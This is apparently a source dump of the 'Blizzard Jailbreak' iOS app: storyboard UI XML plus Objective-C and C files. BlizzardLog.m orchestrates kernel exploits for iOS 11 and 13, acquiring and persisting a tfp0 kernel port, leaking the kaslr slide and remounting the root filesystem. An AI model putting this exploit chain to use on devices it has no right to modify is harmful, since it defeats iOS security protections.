<constraint firstAttribute="bottom" secondItem="IMk-rn-peb" secondAttribute="bottom" constant="-34" id="abB-9D-Xd3"/>
<constraint firstItem="2nt-NA-u5V" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="30" id="eGu-pX-zhC"/>
<constraint firstItem="Lg7-ka-Z5I" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="103" id="pYK-Pg-NCr"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="Lg7-ka-Z5I" secondAttribute="trailing" constant="103" id="tr5-08-hBA"/>
<constraint firstItem="IMk-rn-peb" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" id="uRA-zq-YiX"/>
<constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="2nt-NA-u5V" secondAttribute="trailing" constant="30" id="wiI-AC-2N6"/>
<constraint firstItem="ZQt-HB-KcQ" firstAttribute="centerX" secondItem="8bC-Xf-vdC" secondAttribute="centerX" id="yPD-m1-UWo"/>
</constraints>
<viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
</view>
<connections>
<outlet property="blizzardInit" destination="ZQt-HB-KcQ" id="TU9-7F-pmQ"/>
<segue destination="1cP-8T-Syx" kind="modal" identifier="vc" modalPresentationStyle="fullScreen" modalTransitionStyle="coverVertical" id="5ML-c8-fwh"/>
<segue destination="ccD-bF-PLb" kind="showDetail" identifier="settingsView" id="IJs-qc-Ey8"/>
</connections>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="dkx-z0-nzr" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="-9.375" y="132.04225352112675"/>
</scene>
<!--Jailbreaking-->
<scene sceneID="Urq-5U-iiU">
<objects>
<viewController storyboardIdentifier="vc" title="Jailbreaking" modalPresentationStyle="pageSheet" useStoryboardIdentifierAsRestorationIdentifier="YES" id="1cP-8T-Syx" customClass="BlizzardLog" sceneMemberID="viewController">
<view key="view" contentMode="scaleToFill" id="m8P-iR-Ifq">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<textView clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" indicatorStyle="white" keyboardDismissMode="interactive" editable="NO" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="fte-IW-BJz">
<rect key="frame" x="0.0" y="20" width="320" height="466"/>
<color key="backgroundColor" red="0.059621539360000003" green="0.12937427879999999" blue="0.23696567360000001" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<fontDescription key="fontDescription" name="Avenir-Book" family="Avenir" pointSize="14"/>
<textInputTraits key="textInputTraits" autocapitalizationType="sentences"/>
</textView>
<button opaque="NO" alpha="0.69999999999999996" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="6gp-uK-PGB">
<rect key="frame" x="30" y="494" width="260" height="54"/>
<constraints>
<constraint firstAttribute="height" constant="54" id="yAp-AT-6Rb"/>
</constraints>
<fontDescription key="fontDescription" name="HelveticaNeue-Light" family="Helvetica Neue" pointSize="18"/>
<state key="normal" title="Dismiss Jailbreak Log" backgroundImage="button_mask">
<color key="titleColor" cocoaTouchSystemColor="darkTextColor"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
<variation key="heightClass=regular-widthClass=regular">
<fontDescription key="fontDescription" name="HelveticaNeue-Light" family="Helvetica Neue" pointSize="18"/>
</variation>
<connections>
<action selector="blizzardInit:" destination="BYZ-38-t0r" eventType="touchUpInside" id="Glp-ZU-t1C"/>
<action selector="dismissLogWindow:" destination="1cP-8T-Syx" eventType="touchUpInside" id="mdK-Eu-11O"/>
</connections>
</button>
<imageView userInteractionEnabled="NO" alpha="0.02" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="winter" translatesAutoresizingMaskIntoConstraints="NO" id="ZQT-Zx-TGV">
<rect key="frame" x="32" y="156" width="256" height="256"/>
</imageView>
</subviews>
<color key="backgroundColor" red="0.059621539360400544" green="0.12937427881651739" blue="0.23696567357512954" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="tintColor" white="0.0" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<constraints>
<constraint firstItem="ZQT-Zx-TGV" firstAttribute="centerX" secondItem="m8P-iR-Ifq" secondAttribute="centerX" id="6QC-jo-CBx"/>
<constraint firstItem="Svv-JT-Cgl" firstAttribute="trailing" secondItem="6gp-uK-PGB" secondAttribute="trailing" constant="30" id="A4t-gI-UZG"/>
<constraint firstItem="fte-IW-BJz" firstAttribute="trailing" secondItem="Svv-JT-Cgl" secondAttribute="trailing" id="BnC-xG-BEL"/>
<constraint firstItem="fte-IW-BJz" firstAttribute="centerX" secondItem="m8P-iR-Ifq" secondAttribute="centerX" id="De6-Ez-cWn"/>
<constraint firstItem="6gp-uK-PGB" firstAttribute="leading" secondItem="Svv-JT-Cgl" secondAttribute="leading" constant="30" id="K10-i5-DpT"/>
<constraint firstItem="Svv-JT-Cgl" firstAttribute="bottom" secondItem="6gp-uK-PGB" secondAttribute="bottom" constant="20" id="LQ4-mI-vaj"/>
<constraint firstItem="ZQT-Zx-TGV" firstAttribute="centerY" secondItem="m8P-iR-Ifq" secondAttribute="centerY" id="Nca-Bv-pGg"/>
<constraint firstItem="fte-IW-BJz" firstAttribute="leading" secondItem="Svv-JT-Cgl" secondAttribute="leading" id="SMt-1M-7FG"/>
<constraint firstItem="6gp-uK-PGB" firstAttribute="top" secondItem="fte-IW-BJz" secondAttribute="bottom" constant="8" id="fU8-e9-6aP"/>
<constraint firstItem="fte-IW-BJz" firstAttribute="top" secondItem="Svv-JT-Cgl" secondAttribute="top" id="qMd-od-gY8"/>
</constraints>
<viewLayoutGuide key="safeArea" id="Svv-JT-Cgl"/>
</view>
<connections>
<outlet property="dismissLog" destination="6gp-uK-PGB" id="JaG-sa-OQZ"/>
<outlet property="uiLogView" destination="fte-IW-BJz" id="fyt-x8-grl"/>
</connections>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="yZA-KH-vhq" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="732" y="132"/>
</scene>
<!--Blizzard View-->
<scene sceneID="MPx-FZ-cTW">
<objects>
<viewController id="ccD-bF-PLb" customClass="blizzardView" sceneMemberID="viewController">
<view key="view" contentMode="scaleToFill" id="e5t-i2-8ZF">
<rect key="frame" x="0.0" y="0.0" width="320" height="568"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<imageView userInteractionEnabled="NO" alpha="0.019999999552965164" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="winter" translatesAutoresizingMaskIntoConstraints="NO" id="pjT-vc-P8o">
<rect key="frame" x="32" y="156" width="256" height="256"/>
</imageView>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="BLIZZARD JAILBREAK" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="BNm-0w-E3T">
<rect key="frame" x="38" y="27" width="244" height="30"/>
<constraints>
<constraint firstAttribute="height" constant="30" id="8h3-rS-OsF"/>
</constraints>
<fontDescription key="fontDescription" type="system" pointSize="25"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable SSH" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="LlD-Gd-k5x">
<rect key="frame" x="16" y="76" width="100" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="Lo2-8G-vdS">
<rect key="frame" x="253" y="71" width="51" height="31"/>
<color key="onTintColor" red="0.72446093024843261" green="0.64574749504835438" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="thumbTintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
</switch>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable Substitute" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="F44-ZB-bbA">
<rect key="frame" x="16" y="115" width="150" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="c6c-Vb-Re1">
<rect key="frame" x="253" y="110" width="51" height="31"/>
<color key="onTintColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="thumbTintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
</switch>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Provision as Development" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="YV7-ks-D53">
<rect key="frame" x="16" y="154" width="220" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="X8I-y7-WsC">
<rect key="frame" x="253" y="149" width="51" height="31"/>
<color key="onTintColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="thumbTintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
</switch>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Block iOS Updates" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="yAE-R0-Bul">
<rect key="frame" x="16" y="193" width="159" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="oAF-uh-bO8">
<rect key="frame" x="253" y="188" width="51" height="31"/>
<color key="onTintColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="thumbTintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
</switch>
<button opaque="NO" alpha="0.84999999999999998" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="mh9-gl-or8">
<rect key="frame" x="69" y="314" width="181" height="40"/>
<constraints>
<constraint firstAttribute="height" constant="40" id="50J-ds-OGx"/>
</constraints>
<fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
<state key="normal" title="Uninstall Blizzard" backgroundImage="button_mask">
<color key="titleColor" red="0.66965128490215986" green="0.59689297479878445" blue="0.92434423575129532" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
</button>
<button opaque="NO" alpha="0.84999999999999998" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="ynI-kc-Znh">
<rect key="frame" x="16" y="506" width="286" height="42"/>
<constraints>
<constraint firstAttribute="height" constant="42" id="ivX-Ua-KWg"/>
</constraints>
<state key="normal" title="SAVE SETTINGS" backgroundImage="button_mask">
<color key="titleColor" red="0.059621539360000003" green="0.12937427879999999" blue="0.23696567360000001" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
</state>
<userDefinedRuntimeAttributes>
<userDefinedRuntimeAttribute type="number" keyPath="layer.cornerRadius">
<integer key="value" value="20"/>
</userDefinedRuntimeAttribute>
<userDefinedRuntimeAttribute type="boolean" keyPath="clipsToBounds" value="YES"/>
</userDefinedRuntimeAttributes>
<connections>
<action selector="saveJailbreakSettings:" destination="ccD-bF-PLb" eventType="touchUpInside" id="pUi-Ou-cLm"/>
</connections>
</button>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Set Nonce" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumFontSize="9" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="sFS-xy-61l">
<rect key="frame" x="16" y="232" width="101" height="23"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
<nil key="highlightedColor"/>
</label>
<textField opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="center" text="0x1111111111111111" borderStyle="roundedRect" placeholder="0x1111111111111111" clearsOnBeginEditing="YES" adjustsFontForContentSizeCategory="YES" minimumFontSize="17" clearButtonMode="whileEditing" translatesAutoresizingMaskIntoConstraints="NO" id="OjN-ig-hZR">
<rect key="frame" x="133" y="228" width="169" height="30"/>
<color key="backgroundColor" red="0.079355003360750492" green="0.17626018463250789" blue="0.31915884067357514" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<color key="tintColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<constraints>
<constraint firstAttribute="width" secondItem="OjN-ig-hZR" secondAttribute="height" multiplier="169:30" id="0NE-MG-rri"/>
<constraint firstAttribute="height" constant="30" id="U5F-Qb-Cgv"/>
<constraint firstAttribute="width" constant="169" id="Xw3-QH-HKY"/>
</constraints>
<color key="textColor" red="0.72446093020000002" green="0.64574749499999995" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<fontDescription key="fontDescription" type="system" pointSize="19"/>
<textInputTraits key="textInputTraits" autocorrectionType="no" spellCheckingType="no" keyboardAppearance="alert" returnKeyType="continue" smartDashesType="no" smartInsertDeleteType="no" smartQuotesType="no" textContentType="name"/>
</textField>
</subviews>
<color key="backgroundColor" red="0.059621539360000003" green="0.12937427879999999" blue="0.23696567360000001" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
<constraints>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="X8I-y7-WsC" secondAttribute="trailing" constant="18" id="3b3-3L-gMM"/>
<constraint firstItem="ynI-kc-Znh" firstAttribute="top" secondItem="mh9-gl-or8" secondAttribute="bottom" constant="152" id="8qF-Xl-0lj"/>
<constraint firstItem="Lo2-8G-vdS" firstAttribute="top" secondItem="BNm-0w-E3T" secondAttribute="bottom" constant="14" id="8xL-VB-xgI"/>
<constraint firstItem="sFS-xy-61l" firstAttribute="top" secondItem="yAE-R0-Bul" secondAttribute="bottom" constant="16" id="9mb-zn-H5i"/>
<constraint firstItem="oAF-uh-bO8" firstAttribute="top" secondItem="X8I-y7-WsC" secondAttribute="bottom" constant="8" id="AiU-6Y-ndB"/>
<constraint firstItem="F44-ZB-bbA" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="BlI-uK-tQW"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="mh9-gl-or8" secondAttribute="trailing" constant="70" id="F5Q-vD-G6G"/>
<constraint firstItem="mh9-gl-or8" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="69" id="HQ9-ub-NTG"/>
<constraint firstItem="BNm-0w-E3T" firstAttribute="top" secondItem="nFT-lw-eC5" secondAttribute="top" constant="7" id="HYO-e7-J4F"/>
<constraint firstItem="X8I-y7-WsC" firstAttribute="top" secondItem="c6c-Vb-Re1" secondAttribute="bottom" constant="8" id="M7T-X5-e9J"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="Lo2-8G-vdS" secondAttribute="trailing" constant="18" id="MmP-dg-hOy"/>
<constraint firstItem="yAE-R0-Bul" firstAttribute="top" secondItem="YV7-ks-D53" secondAttribute="bottom" constant="16" id="Pak-Wy-onw"/>
<constraint firstItem="c6c-Vb-Re1" firstAttribute="top" secondItem="Lo2-8G-vdS" secondAttribute="bottom" constant="8" id="R7Q-9U-1yE"/>
<constraint firstItem="pjT-vc-P8o" firstAttribute="centerY" secondItem="e5t-i2-8ZF" secondAttribute="centerY" id="RI6-NN-Fuy"/>
<constraint firstItem="F44-ZB-bbA" firstAttribute="top" secondItem="LlD-Gd-k5x" secondAttribute="bottom" constant="16" id="V4Q-g2-DPJ"/>
<constraint firstItem="YV7-ks-D53" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="WU9-Ef-nNM"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="c6c-Vb-Re1" secondAttribute="trailing" constant="18" id="Xvz-po-bDZ"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="BNm-0w-E3T" secondAttribute="trailing" constant="38" id="ZTm-lu-vPV"/>
<constraint firstItem="LlD-Gd-k5x" firstAttribute="top" secondItem="BNm-0w-E3T" secondAttribute="bottom" constant="19" id="bKt-TL-c21"/>
<constraint firstItem="BNm-0w-E3T" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="38" id="ccu-3H-g5F"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="bottom" secondItem="ynI-kc-Znh" secondAttribute="bottom" constant="20" id="ce6-iL-T9Y"/>
<constraint firstItem="LlD-Gd-k5x" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="dAW-mp-db8"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="ynI-kc-Znh" secondAttribute="trailing" constant="18" id="hWi-aQ-jY0"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="oAF-uh-bO8" secondAttribute="trailing" constant="18" id="i23-en-Q48"/>
<constraint firstItem="ynI-kc-Znh" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="kNS-Na-G9j"/>
<constraint firstItem="YV7-ks-D53" firstAttribute="top" secondItem="F44-ZB-bbA" secondAttribute="bottom" constant="16" id="kiI-Iu-4Wc"/>
<constraint firstItem="nFT-lw-eC5" firstAttribute="trailing" secondItem="OjN-ig-hZR" secondAttribute="trailing" constant="18" id="kqV-G0-UgE"/>
<constraint firstItem="pjT-vc-P8o" firstAttribute="centerX" secondItem="e5t-i2-8ZF" secondAttribute="centerX" id="oSw-oR-gxE"/>
<constraint firstItem="OjN-ig-hZR" firstAttribute="leading" secondItem="sFS-xy-61l" secondAttribute="trailing" constant="16" id="sgx-bn-FSg"/>
<constraint firstItem="OjN-ig-hZR" firstAttribute="top" secondItem="oAF-uh-bO8" secondAttribute="bottom" constant="9" id="uJ3-Jc-0s7"/>
<constraint firstItem="yAE-R0-Bul" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="wZz-NQ-Cuj"/>
<constraint firstItem="sFS-xy-61l" firstAttribute="leading" secondItem="nFT-lw-eC5" secondAttribute="leading" constant="16" id="zKT-na-bU3"/>
</constraints>
<viewLayoutGuide key="safeArea" id="nFT-lw-eC5"/>
</view>
<connections>
<outlet property="nonceField" destination="OjN-ig-hZR" id="Y5S-dg-ivX"/>
</connections>
</viewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="5aV-ZD-Tsj" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="1493.5999999999999" y="-249.62518740629687"/>
</scene>
</scenes>
<resources>
<image name="button_mask" width="100" height="100"/>
<image name="jailbreak_wallpaper" width="834" height="1194"/>
<image name="winter" width="256" height="256"/>
</resources>
</document>
================================================
FILE: Blizzard Jailbreak/BlizzardLog.h
================================================
//
// BlizzardLog.h
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import <UIKit/UIKit.h>
NS_ASSUME_NONNULL_BEGIN
@interface BlizzardLog : UIViewController
@property (weak, nonatomic) IBOutlet UIButton *dismissLog;
@property (weak, nonatomic) IBOutlet UITextView *uiLogView;
+ (instancetype)BlizzLogger;
- (void)displaySnapshotNotice;
- (void)customizeBtnAtUI;
@end
NS_ASSUME_NONNULL_END
================================================
FILE: Blizzard Jailbreak/BlizzardLog.m
================================================
//
// BlizzardLog.m
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import "BlizzardLog.h"
#import "../Kernel Utilities/system_reboot.h"
#import "../Exploits/sock_port/exploit.h"
#import "../Blizzard Jailbreak/blizzardJailbreak.h"
#import "../APFS Utilities/rootfs_remount.h"
#import "../Exploits/FreeTheSandbox/freethesandbox.h"
#define currentVer(v) ([[[UIDevice currentDevice] systemVersion] compare:@v options:NSNumericSearch] != NSOrderedDescending)
@interface BlizzardLog()
@end
static BlizzardLog *BlizzLogger;
@implementation BlizzardLog
+ (instancetype)BlizzLogger {
return BlizzLogger;
}
int dismissButtonActionType = 0;
int IS_BLIZZARD_DEBUG = 0;
int shouldUnjailbreak = 0;
- (void)viewDidLoad {
[super viewDidLoad];
if (IS_BLIZZARD_DEBUG != 1){
[self redirectSTD:STDOUT_FILENO];
}
NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);
[self.uiLogView scrollRangeToVisible:lastLine];
dispatch_async(dispatch_get_global_queue(0, 0), ^{
[self runJailbreak];
dispatch_async(dispatch_get_main_queue(), ^{
//update UI in main thread.
});
});
}
-(void) runJailbreak {
if (currentVer("11.4")){
if (ios11_exploit_init() == 0){
if (shouldUnjailbreak == 1){
if (unjailbreakBlizzard() == 0){
dismissButtonActionType = 1;
printf("Unjailbroken!\n");
[self.dismissLog setTitle:@"REBOOT DEVICE" forState:UIControlStateNormal];
}
return;
}
if (remountFileSystem() == 0 && shouldReboot == 1 && shouldUnjailbreak != 1){
dismissButtonActionType = 1;
[self.dismissLog setTitle:@"REBOOT DEVICE" forState:UIControlStateNormal];
} else {
printf("Used the old remount, tee hee\n");
installBootStrap();
cleanupAfterBlizzard();
}
}
} else if (currentVer("13.7")){
extern char *get_current_deviceModel(void);
printf("Model: %s\n", get_current_deviceModel());
printf("Version: %s\n", [[[UIDevice currentDevice] systemVersion] UTF8String]);
extern uint64_t kaslr;
extern mach_port_t tfp0_port;
// Activate tfp0-persis program
mach_port_t midi_bsport = 0;
extern kern_return_t bootstrap_look_up(mach_port_t bp, const char *service_name, mach_port_t *sp);
bootstrap_look_up(bootstrap_port, "com.apple.midiserver", &midi_bsport);
if(!midi_bsport){
//printf("run_exploit_or_achieve_tf0 failed: bootstrap_look_up has problem\n");
exit(1);
}
mach_port_t stored_ports[3] = {0};
stored_ports[0] = mach_task_self();
stored_ports[2] = midi_bsport;
mach_ports_register(mach_task_self(), stored_ports, 3);
// Waiting for installation
sleep(2);
tfp0_port = 0;
task_get_special_port(mach_task_self(), TASK_ACCESS_PORT, &tfp0_port);
if(tfp0_port == 0){
printf("require to run exploit first\n");
extern bool check_device_compatibility(void);
if(check_device_compatibility() == false){
printf("Execution pause: Not found offsets set for current device(model: %s)\n", get_current_deviceModel());
return;
}
extern void exploit_start(void);
iOS13_exploit_init();
printf("persis tfp0 installed, you can quit app now...\n");
return;
}
stored_ports[2] = 0;
mach_ports_register(mach_task_self(), stored_ports, 3);
printf("tfp0: 0x%x\n", tfp0_port);
pid_for_task(tfp0_port, (int*)&kaslr);
printf("kaslr: 0x%x\n", (uint32_t)kaslr);
}
}
- (IBAction)dismissLogWindow:(id)sender {
if (dismissButtonActionType == 0){
[self dismissViewControllerAnimated:YES completion:nil];
} else if (dismissButtonActionType == 1){
[self loadSystemNotif];
}
}
-(void)textViewDidChange:(UITextView *)textView
{
NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);
[self.uiLogView scrollRangeToVisible:lastLine];
}
- (void)redirectNotificationHandle:(NSNotification *)nf{
NSData *data = [[nf userInfo] objectForKey:NSFileHandleNotificationDataItem];
NSString *str = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];
self.uiLogView.text = [NSString stringWithFormat:@"%@\n%@",self.uiLogView.text, str];
NSRange lastLine = NSMakeRange(self.uiLogView.text.length - 1, 1);
[self.uiLogView scrollRangeToVisible:lastLine];
[[nf object] readInBackgroundAndNotify];
}
- (void)redirectSTD:(int )fd{
setvbuf(stdout, nil, _IONBF, 0);
NSPipe * pipe = [NSPipe pipe] ;
NSFileHandle *pipeReadHandle = [pipe fileHandleForReading] ;
dup2([[pipe fileHandleForWriting] fileDescriptor], fd) ;
[[NSNotificationCenter defaultCenter] addObserver:self
selector:@selector(redirectNotificationHandle:)
name:NSFileHandleReadCompletionNotification
object:pipeReadHandle] ;
[pipeReadHandle readInBackgroundAndNotify];
}
- (void)loadSystemNotif {
dispatch_async(dispatch_get_main_queue(), ^{
UIAlertController *apfsNoticeController = [UIAlertController alertControllerWithTitle:(@"Blizzard Jailbreak") message:(@"The APFS Snapshot has been successfully renamed! Your device will reboot now. If you wanna jailbreak, please come back to the app and re-jailbreak upon reboot.") preferredStyle:UIAlertControllerStyleAlert];
[apfsNoticeController addAction:[UIAlertAction actionWithTitle:(@"Dismiss") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
reboot(RB_NOSYNC);
}]];
[self presentViewController:apfsNoticeController animated:YES completion:nil];
});
}
@end
================================================
FILE: Blizzard Jailbreak/BlizzardSpawnerTools.c
================================================
//
// BlizzardSpawnerTools.c
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/11/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#include "BlizzardSpawnerTools.h"
#import <string.h>
#import <stdlib.h>
#import <stdio.h>
#import <unistd.h>
#import <spawn.h>
#import <sys/mman.h>
#import <sys/attr.h>
#import <mach/mach.h>
#import <sys/types.h>
#import <CommonCrypto/CommonDigest.h>
int launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env) {
const char* args[] = {whom, arg1, arg2, arg3, arg4, arg5, arg6, NULL};
pid_t process_pid;
posix_spawnattr_t attr;
posix_spawnattr_init(&attr);
posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED);
int returnValue = posix_spawn(&process_pid, whom, NULL, &attr, (char **)&args, env);
if (returnValue) {
return returnValue;
} else {
return process_pid;
}
}
================================================
FILE: Blizzard Jailbreak/BlizzardSpawnerTools.h
================================================
//
// BlizzardSpawnerTools.h
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/11/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#ifndef BlizzardSpawnerTools_h
#define BlizzardSpawnerTools_h
#include <stdio.h>
int launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);
#endif /* BlizzardSpawnerTools_h */
================================================
FILE: Blizzard Jailbreak/Info.plist
================================================
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
